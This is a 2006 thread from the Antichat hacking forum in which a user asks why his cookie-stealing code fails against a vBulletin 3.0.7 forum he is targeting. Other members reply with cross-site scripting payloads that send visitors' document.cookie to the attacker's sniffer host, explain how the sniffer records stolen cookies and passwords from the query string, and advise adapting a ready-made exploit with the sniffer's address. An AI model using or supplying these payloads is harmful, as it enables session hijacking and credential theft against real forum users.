ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Оффтоп > Forum for discussion of ANTICHAT
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

posting cookie steal code to forums?
  #1  
Старый 07.06.2006, 21:09
Аватар для !!RapBoy!!
!!RapBoy!!
Новичок
Регистрация: 12.05.2006
Сообщений: 12
Провел на форуме:
52588

Репутация: 1
По умолчанию posting cookie steal code to forums?

Hi guyz

I uploaded my own sniffer to my host and I did all the settings , I posted these codes to steal cookie <a href="http://myhost/s.jpg?it is test">click me</a>

and <img src="http:/myhost/s.jpg"> and <script>img = new Image(); img.src = "http://myhost/s.jpg?"+document.cookie;</script>

I posted above codes to my target forum but they worked like text I mean they did not work where should I write these codes to work ,My target forum's html codes are off. Which codes should I use to steal cookie? Above codes do not work why?

Thanxx
 
Ответить с цитированием

  #2  
Старый 07.06.2006, 21:36
Аватар для Dracula4ever
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
По умолчанию

To steal cookies you should use this codes (try them all):

Код:
'><script>img=new Image();img.src="http:/myhost/s.jpg.?"+document.cookie;"+document.cookie;</script>
Код:
'><script src=http:/myhost/s.jpg></script>

Enjoy
 
Ответить с цитированием

  #3  
Старый 07.06.2006, 23:04
Аватар для max_pain89
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

this <a href="http://myhost/s.jpg?it is test">click me</a> and this
<img src="http:/myhost/s.jpg">

is not a cookie stealing codes. because cookie stealers use JAVA scripts. The Cookies cames to haker in QUERY STRING.
in http://bbs.com/news.php?news_id=6&print=on query string is "news_id=6&print=on".
The cookie sniffer SAVE all query strings that connect to him.

IF user's cookie is user=Mike;password=xxx
JAVA script replace +document.cookie in
Цитата:
<img src='http://ya.ru/logo.gif' onload='i=new Image();i.src="http://www.gfdfdgdfg/?"+document.cookie;'>
for real cookies from user's browser and connect to http://www.gfdfdgdfg.com/sniffer.php?user=Mike;password=xxx browser think that it is a image, but don't display it.

YOU SEE. QUERY_STRING is ?user=Mike;password=xxx it will be saved by your SNIFFER http://www.gfdfdgdfg.com/sniffer.php

Sorry for bad, bad English.
 
Ответить с цитированием

  #4  
Старый 08.06.2006, 00:10
Аватар для !!RapBoy!!
!!RapBoy!!
Новичок
Регистрация: 12.05.2006
Сообщений: 12
Провел на форуме:
52588

Репутация: 1
По умолчанию

Цитата:
Сообщение от dracula4ever  
To steal cookies you should use this codes (try them all):

Код:
'><script>img=new Image();img.src="http:/myhost/s.jpg.?"+document.cookie;"+document.cookie;</script>
Код:
'><script src=http:/myhost/s.jpg></script>

Enjoy

Where should I write these codes if ı post them as an answer for a topic, they work like a text ,cookies do not reach to my sniffer??
 
Ответить с цитированием

  #5  
Старый 08.06.2006, 13:01
Аватар для bul.666
bul.666
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705

Репутация: 1403


Отправить сообщение для bul.666 с помощью ICQ
По умолчанию

What forum?
 
Ответить с цитированием

  #6  
Старый 08.06.2006, 15:05
Аватар для Dracula4ever
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
По умолчанию

Цитата:
Сообщение от !!RapBoy!!  
Where should I write these codes if ı post them as an answer for a topic, they work like a text ,cookies do not reach to my sniffer??
http://www.forum.antichat.ru/thread20140.html

Read this text and if you have any questions just write them here.
 
Ответить с цитированием

  #7  
Старый 08.06.2006, 16:32
Аватар для NeMiNeM
NeMiNeM
Постоянный
Регистрация: 22.08.2005
Сообщений: 540
Провел на форуме:
4372175

Репутация: 1221


По умолчанию

Цитата:
Where should I write these codes if ı post them as an answer for a topic, they work like a text ,cookies do not reach to my sniffer??
You must know the version of that forum. Those codes won't work. You should find a ready-made exploit for the version of that forum, edit it and write the address of your sniffer. Or learn to find some bugs to by-pass different filters.
 
Ответить с цитированием

  #8  
Старый 08.06.2006, 18:27
Аватар для !!RapBoy!!
!!RapBoy!!
Новичок
Регистрация: 12.05.2006
Сообщений: 12
Провел на форуме:
52588

Репутация: 1
По умолчанию

Forum ı am trying to steal cookie is vBulletin Version 3.0.7
I tried some exploits in general but do you suggest any special and there is no filters for codes , ı just think ı make something wrong in somewhere but where

Последний раз редактировалось !!RapBoy!!; 08.06.2006 в 21:16..
 
Ответить с цитированием

  #9  
Старый 09.06.2006, 16:04
Аватар для NeMiNeM
NeMiNeM
Постоянный
Регистрация: 22.08.2005
Сообщений: 540
Провел на форуме:
4372175

Репутация: 1221


По умолчанию

Are you trying to steal cookies from the users of our forum?=)))
That forum may be patched =\
 
Ответить с цитированием

  #10  
Старый 09.06.2006, 16:53
Аватар для Dracula4ever
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
По умолчанию

I agree with NeMiNeM .
Maybe the forum be patched by someone.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Фальсификация cookie k00p3r Чужие Статьи 6 11.04.2010 19:36
An image file to steal cookie ? ghostshadow189 Forum for discussion of ANTICHAT 9 22.04.2006 19:52
Взлом через cookie k00p3r Чужие Статьи 0 13.06.2005 13:56
Cookies Болталка 9 11.01.2004 03:43



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ